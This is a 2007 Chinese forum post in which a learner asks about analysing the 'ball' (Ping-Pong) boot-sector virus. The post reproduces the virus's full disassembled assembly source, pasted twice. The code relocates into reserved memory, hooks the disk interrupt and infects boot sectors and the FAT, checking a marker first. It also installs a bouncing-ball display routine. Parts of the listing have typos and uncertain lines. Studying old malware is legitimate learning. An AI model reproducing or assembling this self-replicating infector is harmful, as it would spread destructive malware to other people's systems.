您所在位置:主题:新学汇编自行分析小球病毒有问题请教各位
skt90
[专家分:0] 发布于 2007-08-06 04:35:00
我现在分析了开头,有几个问题请教大家:
1.自制堆栈到底有什么用
2.病毒在执行时调用13H中断重启磁盘系统有什么用
3.0000:7df8 中存的是什么
源代码:
cseg segment
assume cs:cseg
org 7c00h
main proc far
;0000:7c00————————-
stav:jmp start
自制堆栈:
db 49h, 42h, 4Dh, 20h, 20h,37h, 2Eh, 30h, 00h, 02h, 04h, 01h, 00h
db 02h, 00h, 02h, 07h,0A3h,0F8h, 29h, 00h,11h, 00h, 04h, 00h, 11h, 00h, 0FFh,0FFh
;0000:7c1e————————-
start:
xor ax,ax
mov ss,ax
mov sp,7c00h ;堆栈初始化
{
mov ds,ax
mov ax,ds:[0413h] ;申请2KB空间
sub ax,0002h
mov word ptr ds:[413h],ax ;ax=027EH
mov cl,06h
shl ax,cl ;ax=9F80H
sub ax,07c0h ;ax=97C0H
}
;7c37——————————————————-
mov es,ax ;ES=97C0H
mov si,7c00h ;SI=7C00H
mov di,si ;DI=7C00H
mov cx,0100h ;CX=0100H
repzmovsw ;大挪移:从0000:7C00送到97C0:7C00(总共移动512字节)
; mov cs,ax
; push ax ;let the two line tocomplish ‘mov cs,ax‘
; pop cs
jmp es:$+2 ;到高端继续执行
;97c0:7c45————————————————————
push cs
pop ds ;[cs]->[ds],数据区也跑高端了
call comd1 ;7c4a
;7c4a———————————
comd1:
xor ah,ah ;ah清0
int 13 ;13号中断(重启磁盘系统)
and byte ptr [0:7df8h],80h
mov bx,[0:7df9h]
push cs
pop ax
sub ax,0020h
mov es,ax
call con2 ;7c9d
mov bx,[0:7df9h]
inc bx
mov ax,0ffc0h
mov es,ax
call con2 ;7c9d
xor ax,ax
mov [0:7df7h],al
mov ds,ax
;7c75————————————————————-
mov ax,[0:04ch]
mov bx,[0:04eh]
mov si,word ptr [0:7cd0h]
mov word ptr[0:04ch],si ;7cd0 Need register in expression
mov [0:04eh],cs
push cs
pop ds
mov [0:7d2ah],ax
mov [0:7d2ch],bx
mov dl,[0:7df8h]
jmp stav ;000:7c00h
;7c98————————————————————————
con1:
mov ax,0301h
jmp con21 ;7ca0
;7c9d——————————————-
con2:
mov ax,0201h
;7ca0————————————————-
con21:
xchg bx,ax
add ax,[0:7c1ch]
xor dx,dx
div word ptr [0:7c18h]
inc dl
mov ch,dl
xor dx,dx
div word ptr [0:7c1ah]
mov cl,06h
shl ah,cl
or ah,ch
mov cx,ax
xchg ch,cl
mov dh,dl
mov ax,bx
;7cc3————————————————-
con3:
mov dl,[0:7df8h]
mov bx,8000h
int 13
jnb emd
pop ax
;7ccf——————————————————-
emd:
ret
;7cd0——————————————-
push ds
push es
push ax
push bx
push cx
push dx
push cs
pop ds
push cs
pop es
;7cda————————————————
test byte ptr [0:7df7h],01h
jnz go1 ;7d23
cmp ah,02h
jnz go1 ;7d23
cmp [0:7df8h],dl
mov [0:7df8h],dl
jnz go2 ;7d12
;7cf0——————————————————
xor ah,ah
int 1ah
test dh,7fh
jnz go3 ;7d03
test dl,0f0h
jnz go3 ;7d03
push dx
call show ;7eb3
pop dx
;7d03——————————————
go3:
mov cx,dx
sub dx,[0:7eb0h]
mov [0:7eb0h],cx
sub dx,+24h
jbgo1 ;7d23
;7d12————————————————————————————-
go2:
or byte ptr [0:7df7h],01h
push si
push di
call infect ;7d2e
;7d1c————————————————-
pop di
pop si
and byte ptr[0:7df7h],0feh
;7d23————————————
go1:
pop dx
pop cx
pop dx
pop ax
pop es
pop ds
jmp dword ptr [cs:i13] ;c800:051a bios int 13h Illegal number
i13:dw 51ah
dw 0c800h
;7d2e——————————————————————————————-
infect:
mov ax,0201h
mov dh, 00h
mov cx,0001h
call con3 ;7cc3
test byte ptr [0:7df8h],80h
jzgo4 ;7d63
mov si ,81beh
mov cx,0004h
;7d46————————————————-
loop1:
cmp byte ptr [si+4],1
jz go5 ;7d58
cmp byte ptr[si+4],4
jz go5 ;7d58
add si,+10h
loop loop1
ret
;7d58——————————————————————————
go5:
mov dx,[si]
mov cx,[si+2]
mov ax,0201h
call con3 ;7cc3
;7d63——————————————-
go4:
mov si,8002h
mov di,word ptr[0:7c02h] ;7c02
mov cx,001ch
repz
movsb
;7d6e————————————————————————-have infected?
cmp word ptr [0:81fch],1357h
jnz go6 ;7d8b
cmp byte ptr [0:81f8h],00h
jnz go7 ;7d8a
mov ax,[0:81f5h]
mov [0:7df5h],ax
mov si,[0:81f9h]
jmp go8 ;7e92
;7d8a——————————————————————————-
go7:
ret
;——————————
;7d8b————————————————————————————————-
go6:
cmp word ptr [0:800bh],0200h
jnz go7 ;7d8a
cmp byte ptr[0:800dh],02h
jb go7 ;7d8a
mov cx,[0:800eh]
mov al,[0:8010h]
cbw
mul word ptr [0:8016h]
add cx,ax
mov ax,0020h
mul word ptr [0:8011h]
add ax,01ffh
mov bx,0200h
div bx
add cx,ax
mov [0:7df5h],cx
mov ax,[0:7c13h]
sub ax,[0:7df5h]
mov bl,[0:7c0dh]
xor dx,dx
xor bh,bh
div bx
inc ax
mov di,ax
and byte ptr[0:7df7h],0fbh
cmp ax,0ff0h
jbe go9 ;7de0
or byte ptr [0:7df7h],04h
;7de0——————————————-
go9:
mov si,0001h
mov bx,[0:7c0eh]
dec bx
mov [0:7df3h],bx
mov byte ptr [0:7eb2h],0feh
jmp go10 ;7e00
DB 5bh, 03h, 00h, 57h, 13h, 55h,0aah
;7e00————————————————-
go10:
inc word ptr [0:7df3h]
mov bx,[0:7df3h]
add byte ptr [0:7eb2h],02h
call con2 ;7c9d
jmp go11 ;7e4b
;7e12————————————————————-
go16:
mov ax,0003h
test byte ptr[0:7df7h],04h
jz go12 ;7e1d
inc ax
;7e1d——————————————-
go12:
mul si
shr ax,1
sub ah,[0:7eb2h]
mov bx,ax
cmp bx,01ffh
jnbgo10 ;7e00
mov dx,[bx+8000h]
test byte ptr [0:7df7h],04h
jnz go13 ;7e45
mov cl,04h
test si,0001h
jz go14 ;7e42
shr dx,cl
;7e42————————————————————————
go14:
and dh,0fh
;7e45————————————————-
go13:
test dx,0ffffh
jz go15 ;7e51
;7e4b————————————-
go11:
inc si
cmp si ,di
jbe go16 ;7e12
ret
;7e51————————————————-
go15:
mov dx,0fff7h
test byte ptr [0:7df7h],04h
jnz go17 ;7e68
and dh ,0fh
mov cl,04h
test si,0001h
jz go17 ;7e68
shl dx,cl
;7e68——————————————————————
go17:
or [bx+8000h],dx
mov bx,[0:7df3h]
call con1 ;7c98
mov ax,si
sub ax,0002h
mov bl,[0:7c0dh]
xor bh,bh
mul bx
add ax,[0:7df5h]
mov si,ax
mov bx,0000h
call con2 ;7c9d
mov bx,si
inc bx
call con1 ;7c98
;7e92——————————
go8:
mov bx,si
mov [0:7df9h],si
push cs
pop ax
sub ax,0020h
mov es,ax
call con1 ;7c98
;7ea2————————————————-
push cs
pop ax
sub ax,0040h
mov es,ax
mov bx,0000h
call con1 ;7c98
ret
;————————————————————————————————————————————-
; 02 22
nop
;7eb3————————————————————————————————————-
show:
test byte ptr[0:7df7h],02
jnz go18 ;7ede
or byte ptr[0:7df7h],02 ;set showmark
mov ax,0000h
mov ds,ax
mov ax,[0:020h]
mov bx,[0:022h]
lea si,new1c
mov word ptr [0:020h],si ;
7edf Need register in expression
mov [0:022h],cs
push cs
pop ds
mov [0:7fc9h],ax
mov [0:7fcbh],bx
;7ede————————————-
go18:
ret
;7edf————————————————————————————————————
new1c:
push ds
push ax
push bx
push cx
push dx
push cs
pop ds
mov ah,0fh
int 10h
mov bl,bl
cmp bx,[0:7fd4h]
jz go19 ;7f27
mov [0:7fd4h],bx
dec ah
mov [0:7fd6h],ah
mov ah,01h
cmp bl,07h
jnz go20 ;7f05
dec ah
;7f05——————————————————————————
go20:
cmp bl,04h
jnb go21 ;7f0c
dec ah
;7f0c————————————————————-
go21:
mov [0:7fd3h],ah
mov word ptr [0:7fcfh],0101h
mov word ptr [0:7fd1h],0101h
mov ah,03h
push dx
mov dx,[0:7fcfh]
jmp go22 ;7f4a
;7f27——————————————————————————-
go19:
mov ah,03h
int 10h
int 10h
push dx
mov ah,02h
mov dx,[0:7ecfh] ;[7ECF] OR [7FCF]?
int 10h
mov ax,[0:7fcdh]
cmp byte ptr [0:7fd3h],01h
jnz go23 ;7f41
mov ax,8307h
;7f41————————————————————————-
go23:
mov bl,ah
mov cx,0001h
mov ah,09h
int 10h
;7f4a——————————————————————
go22:
mov cx,[0:7fd1h]
cmp dh,00h
jnzgo24 ;7f58
xor ch,0ffh
inc ch
;7f58————————————————————————
go24:
cmp dh,18h
jnzgo25 ;7f62
xor ch,0ffh
inc ch
;7f62————————————————————-
go25:
cmp dl,00h
jnz go26 ;7f6c
xor cl,0ffh
inc cl
;7f6c——————————————————————-
go26:
cmp dl,[0:7fd6h]
jnz go27 ;7f77
xor cl,0ffh
inc cl
;7f77——————————————————-
go27:
cmp cx,[0:7fd1h]
jnz go28 ;7f94
mov ax,[0:7fcdh]
and al,07h
cmp al,03h
jnz go29 ;7f8b
xor ch,0ffh
inc ch
;7f8b——————————————————-
go29:
cmp al,05h
jnz go28 ;7f94
xor cl,0ffh
inc cl
;7f94——————————————————————————
go28:
add dl,cl
add dh,ch
mov [0:7fd1h],cx
mov [0:7fcfh],dx
mov ah,02h
int 10h
mov [0:7fcdh],ax
mov bl,ah
cmp byte ptr [0:7fd3h],01h
jnz go30 ;7fb6
mov bl,83h
;7fb6————————————————————-
go30:
mov cx,0001h
mov ax,0907h
int 10h
pop dx
mov ah,02h
int 10h
pop dx
pop cx
pop bx
pop ax
pop ds
jmpdword ptr [cs:my] ;f000:fea5
my: dw 0fea5h
dw 0f000h
DB 00h,03h,4Bh
DB 0Dh,0FFh,0FFh,01h,06h,00h,4Fh,0B7h,0B7h,0B7h,0B6h,40h,40h,88h,0DEh,0E6h
DB 5Ah,0ACh,0D2h,0E4h,0EAh,0E6h,40h,50h,0ECh,40h,64h,5Ch,60h,52h,40h,40h
DB 40h,40h,64h,62h,5Eh,62h,60h,5Eh,70h,6Eh,40h,41h,0B7h,0B7h,0B7h,0B6h
;7fcd——————————-
main endp
cseg ends
end stav
1.自制堆栈到底有什么用
2.病毒在执行时调用13H中断重启磁盘系统有什么用
3.0000:7df8 中存的是什么
源代码:
cseg segment
assume cs:cseg
org 7c00h
main proc far
;0000:7c00————————-
stav:jmp start
自制堆栈:
db 49h, 42h, 4Dh, 20h, 20h,37h, 2Eh, 30h, 00h, 02h, 04h, 01h, 00h
db 02h, 00h, 02h, 07h,0A3h,0F8h, 29h, 00h,11h, 00h, 04h, 00h, 11h, 00h, 0FFh,0FFh
;0000:7c1e————————-
start:
xor ax,ax
mov ss,ax
mov sp,7c00h ;堆栈初始化
{
mov ds,ax
mov ax,ds:[0413h] ;申请2KB空间
sub ax,0002h
mov word ptr ds:[413h],ax ;ax=027EH
mov cl,06h
shl ax,cl ;ax=9F80H
sub ax,07c0h ;ax=97C0H
}
;7c37——————————————————-
mov es,ax ;ES=97C0H
mov si,7c00h ;SI=7C00H
mov di,si ;DI=7C00H
mov cx,0100h ;CX=0100H
repzmovsw ;大挪移:从0000:7C00送到97C0:7C00(总共移动512字节)
; mov cs,ax
; push ax ;let the two line tocomplish ‘mov cs,ax‘
; pop cs
jmp es:$+2 ;到高端继续执行
;97c0:7c45————————————————————
push cs
pop ds ;[cs]->[ds],数据区也跑高端了
call comd1 ;7c4a
;7c4a———————————
comd1:
xor ah,ah ;ah清0
int 13 ;13号中断(重启磁盘系统)
and byte ptr [0:7df8h],80h
mov bx,[0:7df9h]
push cs
pop ax
sub ax,0020h
mov es,ax
call con2 ;7c9d
mov bx,[0:7df9h]
inc bx
mov ax,0ffc0h
mov es,ax
call con2 ;7c9d
xor ax,ax
mov [0:7df7h],al
mov ds,ax
;7c75————————————————————-
mov ax,[0:04ch]
mov bx,[0:04eh]
mov si,word ptr [0:7cd0h]
mov word ptr[0:04ch],si ;7cd0 Need register in expression
mov [0:04eh],cs
push cs
pop ds
mov [0:7d2ah],ax
mov [0:7d2ch],bx
mov dl,[0:7df8h]
jmp stav ;000:7c00h
;7c98————————————————————————
con1:
mov ax,0301h
jmp con21 ;7ca0
;7c9d——————————————-
con2:
mov ax,0201h
;7ca0————————————————-
con21:
xchg bx,ax
add ax,[0:7c1ch]
xor dx,dx
div word ptr [0:7c18h]
inc dl
mov ch,dl
xor dx,dx
div word ptr [0:7c1ah]
mov cl,06h
shl ah,cl
or ah,ch
mov cx,ax
xchg ch,cl
mov dh,dl
mov ax,bx
;7cc3————————————————-
con3:
mov dl,[0:7df8h]
mov bx,8000h
int 13
jnb emd
pop ax
;7ccf——————————————————-
emd:
ret
;7cd0——————————————-
push ds
push es
push ax
push bx
push cx
push dx
push cs
pop ds
push cs
pop es
;7cda————————————————
test byte ptr [0:7df7h],01h
jnz go1 ;7d23
cmp ah,02h
jnz go1 ;7d23
cmp [0:7df8h],dl
mov [0:7df8h],dl
jnz go2 ;7d12
;7cf0——————————————————
xor ah,ah
int 1ah
test dh,7fh
jnz go3 ;7d03
test dl,0f0h
jnz go3 ;7d03
push dx
call show ;7eb3
pop dx
;7d03——————————————
go3:
mov cx,dx
sub dx,[0:7eb0h]
mov [0:7eb0h],cx
sub dx,+24h
jbgo1 ;7d23
;7d12————————————————————————————-
go2:
or byte ptr [0:7df7h],01h
push si
push di
call infect ;7d2e
;7d1c————————————————-
pop di
pop si
and byte ptr[0:7df7h],0feh
;7d23————————————
go1:
pop dx
pop cx
pop dx
pop ax
pop es
pop ds
jmp dword ptr [cs:i13] ;c800:051a bios int 13h Illegal number
i13:dw 51ah
dw 0c800h
;7d2e——————————————————————————————-
infect:
mov ax,0201h
mov dh, 00h
mov cx,0001h
call con3 ;7cc3
test byte ptr [0:7df8h],80h
jzgo4 ;7d63
mov si ,81beh
mov cx,0004h
;7d46————————————————-
loop1:
cmp byte ptr [si+4],1
jz go5 ;7d58
cmp byte ptr[si+4],4
jz go5 ;7d58
add si,+10h
loop loop1
ret
;7d58——————————————————————————
go5:
mov dx,[si]
mov cx,[si+2]
mov ax,0201h
call con3 ;7cc3
;7d63——————————————-
go4:
mov si,8002h
mov di,word ptr[0:7c02h] ;7c02
mov cx,001ch
repz
movsb
;7d6e————————————————————————-have infected?
cmp word ptr [0:81fch],1357h
jnz go6 ;7d8b
cmp byte ptr [0:81f8h],00h
jnz go7 ;7d8a
mov ax,[0:81f5h]
mov [0:7df5h],ax
mov si,[0:81f9h]
jmp go8 ;7e92
;7d8a——————————————————————————-
go7:
ret
;——————————
;7d8b————————————————————————————————-
go6:
cmp word ptr [0:800bh],0200h
jnz go7 ;7d8a
cmp byte ptr[0:800dh],02h
jb go7 ;7d8a
mov cx,[0:800eh]
mov al,[0:8010h]
cbw
mul word ptr [0:8016h]
add cx,ax
mov ax,0020h
mul word ptr [0:8011h]
add ax,01ffh
mov bx,0200h
div bx
add cx,ax
mov [0:7df5h],cx
mov ax,[0:7c13h]
sub ax,[0:7df5h]
mov bl,[0:7c0dh]
xor dx,dx
xor bh,bh
div bx
inc ax
mov di,ax
and byte ptr[0:7df7h],0fbh
cmp ax,0ff0h
jbe go9 ;7de0
or byte ptr [0:7df7h],04h
;7de0——————————————-
go9:
mov si,0001h
mov bx,[0:7c0eh]
dec bx
mov [0:7df3h],bx
mov byte ptr [0:7eb2h],0feh
jmp go10 ;7e00
DB 5bh, 03h, 00h, 57h, 13h, 55h,0aah
;7e00————————————————-
go10:
inc word ptr [0:7df3h]
mov bx,[0:7df3h]
add byte ptr [0:7eb2h],02h
call con2 ;7c9d
jmp go11 ;7e4b
;7e12————————————————————-
go16:
mov ax,0003h
test byte ptr[0:7df7h],04h
jz go12 ;7e1d
inc ax
;7e1d——————————————-
go12:
mul si
shr ax,1
sub ah,[0:7eb2h]
mov bx,ax
cmp bx,01ffh
jnbgo10 ;7e00
mov dx,[bx+8000h]
test byte ptr [0:7df7h],04h
jnz go13 ;7e45
mov cl,04h
test si,0001h
jz go14 ;7e42
shr dx,cl
;7e42————————————————————————
go14:
and dh,0fh
;7e45————————————————-
go13:
test dx,0ffffh
jz go15 ;7e51
;7e4b————————————-
go11:
inc si
cmp si ,di
jbe go16 ;7e12
ret
;7e51————————————————-
go15:
mov dx,0fff7h
test byte ptr [0:7df7h],04h
jnz go17 ;7e68
and dh ,0fh
mov cl,04h
test si,0001h
jz go17 ;7e68
shl dx,cl
;7e68——————————————————————
go17:
or [bx+8000h],dx
mov bx,[0:7df3h]
call con1 ;7c98
mov ax,si
sub ax,0002h
mov bl,[0:7c0dh]
xor bh,bh
mul bx
add ax,[0:7df5h]
mov si,ax
mov bx,0000h
call con2 ;7c9d
mov bx,si
inc bx
call con1 ;7c98
;7e92——————————
go8:
mov bx,si
mov [0:7df9h],si
push cs
pop ax
sub ax,0020h
mov es,ax
call con1 ;7c98
;7ea2————————————————-
push cs
pop ax
sub ax,0040h
mov es,ax
mov bx,0000h
call con1 ;7c98
ret
;————————————————————————————————————————————-
; 02 22
nop
;7eb3————————————————————————————————————-
show:
test byte ptr[0:7df7h],02
jnz go18 ;7ede
or byte ptr[0:7df7h],02 ;set showmark
mov ax,0000h
mov ds,ax
mov ax,[0:020h]
mov bx,[0:022h]
lea si,new1c
mov word ptr [0:020h],si ;
7edf Need register in expression
mov [0:022h],cs
push cs
pop ds
mov [0:7fc9h],ax
mov [0:7fcbh],bx
;7ede————————————-
go18:
ret
;7edf————————————————————————————————————
new1c:
push ds
push ax
push bx
push cx
push dx
push cs
pop ds
mov ah,0fh
int 10h
mov bl,bl
cmp bx,[0:7fd4h]
jz go19 ;7f27
mov [0:7fd4h],bx
dec ah
mov [0:7fd6h],ah
mov ah,01h
cmp bl,07h
jnz go20 ;7f05
dec ah
;7f05——————————————————————————
go20:
cmp bl,04h
jnb go21 ;7f0c
dec ah
;7f0c————————————————————-
go21:
mov [0:7fd3h],ah
mov word ptr [0:7fcfh],0101h
mov word ptr [0:7fd1h],0101h
mov ah,03h
push dx
mov dx,[0:7fcfh]
jmp go22 ;7f4a
;7f27——————————————————————————-
go19:
mov ah,03h
int 10h
int 10h
push dx
mov ah,02h
mov dx,[0:7ecfh] ;[7ECF] OR [7FCF]?
int 10h
mov ax,[0:7fcdh]
cmp byte ptr [0:7fd3h],01h
jnz go23 ;7f41
mov ax,8307h
;7f41————————————————————————-
go23:
mov bl,ah
mov cx,0001h
mov ah,09h
int 10h
;7f4a——————————————————————
go22:
mov cx,[0:7fd1h]
cmp dh,00h
jnzgo24 ;7f58
xor ch,0ffh
inc ch
;7f58————————————————————————
go24:
cmp dh,18h
jnzgo25 ;7f62
xor ch,0ffh
inc ch
;7f62————————————————————-
go25:
cmp dl,00h
jnz go26 ;7f6c
xor cl,0ffh
inc cl
;7f6c——————————————————————-
go26:
cmp dl,[0:7fd6h]
jnz go27 ;7f77
xor cl,0ffh
inc cl
;7f77——————————————————-
go27:
cmp cx,[0:7fd1h]
jnz go28 ;7f94
mov ax,[0:7fcdh]
and al,07h
cmp al,03h
jnz go29 ;7f8b
xor ch,0ffh
inc ch
;7f8b——————————————————-
go29:
cmp al,05h
jnz go28 ;7f94
xor cl,0ffh
inc cl
;7f94——————————————————————————
go28:
add dl,cl
add dh,ch
mov [0:7fd1h],cx
mov [0:7fcfh],dx
mov ah,02h
int 10h
mov [0:7fcdh],ax
mov bl,ah
cmp byte ptr [0:7fd3h],01h
jnz go30 ;7fb6
mov bl,83h
;7fb6————————————————————-
go30:
mov cx,0001h
mov ax,0907h
int 10h
pop dx
mov ah,02h
int 10h
pop dx
pop cx
pop bx
pop ax
pop ds
jmpdword ptr [cs:my] ;f000:fea5
my: dw 0fea5h
dw 0f000h
DB 00h,03h,4Bh
DB 0Dh,0FFh,0FFh,01h,06h,00h,4Fh,0B7h,0B7h,0B7h,0B6h,40h,40h,88h,0DEh,0E6h
DB 5Ah,0ACh,0D2h,0E4h,0EAh,0E6h,40h,50h,0ECh,40h,64h,5Ch,60h,52h,40h,40h
DB 40h,40h,64h,62h,5Eh,62h,60h,5Eh,70h,6Eh,40h,41h,0B7h,0B7h,0B7h,0B6h
;7fcd——————————-
main endp
cseg ends
end stav
